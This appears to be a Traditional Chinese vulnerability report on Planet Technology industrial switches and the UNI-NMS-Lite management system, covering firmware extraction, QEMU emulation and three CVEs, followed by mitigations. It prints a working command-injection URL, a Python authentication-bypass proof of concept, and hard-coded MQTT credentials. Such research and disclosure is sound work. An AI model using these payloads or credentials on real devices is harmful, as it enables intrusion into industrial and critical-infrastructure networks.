摘要

本報告調查Planet Technology工業網路設備的關鍵漏洞,包括WGS-804HPTWGS-4215-8T2S交換器,以及其網路管理系統(UNI-NMS-Lite)。分析聚焦於三個主要漏洞: CVE-2025-46272 (後認證命令注入, Post-authentication command injection) CVE-2025-46275 (認證繞過,Authentication bypass) CVE-2025-46273 (Hard-coded認證資料, Hard-coded credentials ) 。研究方法結合韌體逆向工程、使用Burp Suite進行動態測試及QEMU模擬。研究結果凸顯IoT/OT設備中的系統性安全缺陷,並提出緩解策略。

駭客如何攻破WDRT-1202AC?漏洞全解析 | 資訊安全新聞

1. 簡介

Planet Technology的工業交換器與網路管理系統廣泛應用於關鍵基礎設施領域。然而,近期由Immersive Labs的Kev Breen及Claroty的Team82等安全研究人員發現的嚴重漏洞顯示,攻擊者可能執行任意命令、繞過認證並獲得管理控制權。本報告重建辨識這些漏洞的技術過程,強調韌體分析、漏洞利用開發及對OT/ICS安全的更廣泛影響。

2. 方法

2.1 韌體取得與提取

Planet的WGS-804HPT及WGS-4215-8T2S交換器的韌體直接從廠商網站取得。韌體檔案採用BIX格式壓縮,為GZIP的變體。研究人員使用7-Zip及 Binwalk v3 ,提取嵌套層次,包括Linux kernel( vmlinux_org.bin )及包含設備網頁介面二進位檔案與設定檔案的SquashFS檔案系統。

關鍵工具:

  • Binwalk :用於遞迴提取韌體元件。
  • Ghidra :用於ELF二進位檔案的靜態分析,辨識不安全函數呼叫(例如 system() popen() )。

2.2 使用QEMU模擬

為在無實體硬體的情況下分析設備的網頁服務,研究人員使用 QEMU 進行系統模擬。WGS-804HPT的MIPS 32位元架構需要:

  1. 用戶空間模擬 :在帶有MIPS函式庫的chroot環境中執行單獨二進位檔案(例如 boa 網頁伺服器)。
  2. 完整系統模擬 :啟動Debian MIPS虛擬機以複製交換器的操作環境。

挑戰:

  • 缺少動態連結器( ld-uClibc.so.0 ),透過符號連結解決。
  • 掛載 /proc 以啟用行程可見性。

3. 漏洞分析

3.1 後認證命令注入 (CVE-2025-46272)

發現:

Python自動化腳本(Script)辨識出 dispatcher.cgi 二進位檔案中的不安全 system() 呼叫。設計用於traceroute功能的 /cgi-bin/dispatcher.cgi?cmd=532 端點,對 ip_URL 參數缺乏輸入清理。

利用: 

http://172.21.1.100/cgi-bin/dispatcher.cgi?cmd=532&ip_URL=; echo `ps -w`&tr_maxhop_URL=30

此payload注入 ps -w 命令,顯示執行中的行程。攻擊者可進一步升級至 Reverse Shell 或修改韌體。

程式碼分析 (Ghidra): 

  1. // 來自dispatcher.cgi的簡化反編譯程式碼
  2. void trace_route() {
  3.   char ip[64];
  4.   snprintf(ip, sizeof(ip), "traceroute %s", get_param("ip_URL"));
  5.   system(ip); // 易受命令注入的漏洞
  6. }

3.2 認證繞過 (CVE-2025-46275)

發現:

使用Burp Suite測試時,發現錯誤設定的session驗證機制允許未經授權存取設定檔案上傳端點( /uploader.cgi )。移除請求中的session cookie即可繞過認證檢查。

影響:

攻擊者可:

  1. 透過Python腳本建立臨時管理帳戶。
  2. 修改執行設定以啟用SSH存取或停用防火牆。

概念驗證: 

  1. # planet-auth-bypass.py
  2. import requests
  3. target = "172.21.1.100"
  4. payload = {"username": "manager", "password": "newpassword"}
  5. response = requests.post(f"http://{target}/cgi-bin/uploader.cgi", data=payload, headers={"Cookie": ""})

3.3 UNI-NMS-Lite中的Hard-Coded認證資料 (CVE-2025-46273)

發現:

Planet的UNI-NMS-Lite中的 nms_agent 二進位檔案使用預設MQTT認證資料( client:client ),允許未經認證存取所有受管理的設備。

利用:

攻擊者可:

  1. 攔截MQTT訊息以操縱設備設定。
  2. 部署惡意韌體更新。

4. 架構弱點

  1. 過時程式碼基礎 :網頁介面使用有緩衝區溢位攻擊漏洞的舊版Boa伺服器元件。
  2. 不安全預設值 :UNI-NMS-Lite使用hard-coded認證資料,反映安全衛生不佳。
  3. 缺乏輸入驗證 :CGI處理程式中未清理的使用者輸入導致注入攻擊。

5. 緩解建議

  • 修補管理 :升級至韌體版本WGS-804HPT v2.305b250121及WGS-4215-8T2S v1.305b241115。
  • 網路分段 :使用防火牆將OT設備與企業網路隔離。
  • 動態分析 :在SDLC期間對CGI端點實施模糊測試。

6. 結論

Planet Technology的漏洞凸顯IoT/OT生態系統中的系統性風險,包括不充分的輸入驗證與不良的認證資料管理。研究人員應優先進行韌體分析與模擬,以發現隱藏的攻擊面。未來工作應探索嵌入式系統中的自動化漏洞檢測。

參考資料

  1. Immersive Labs. How We Discovered Planet Technology Network Device Vulnerabilities.
  2. CISA. ICS Advisory (ICSA-25-114-06): Planet Technology Network Products.
  3. Claroty Team82. Hack The Emulated Planet: Vulnerability Hunting on Planet WGS-804HPT Industrial Switches.
  4. Planet Technology Corp. Security Vulnerabilities.
Copyright © 2025 版權所有 翊天科技有限公司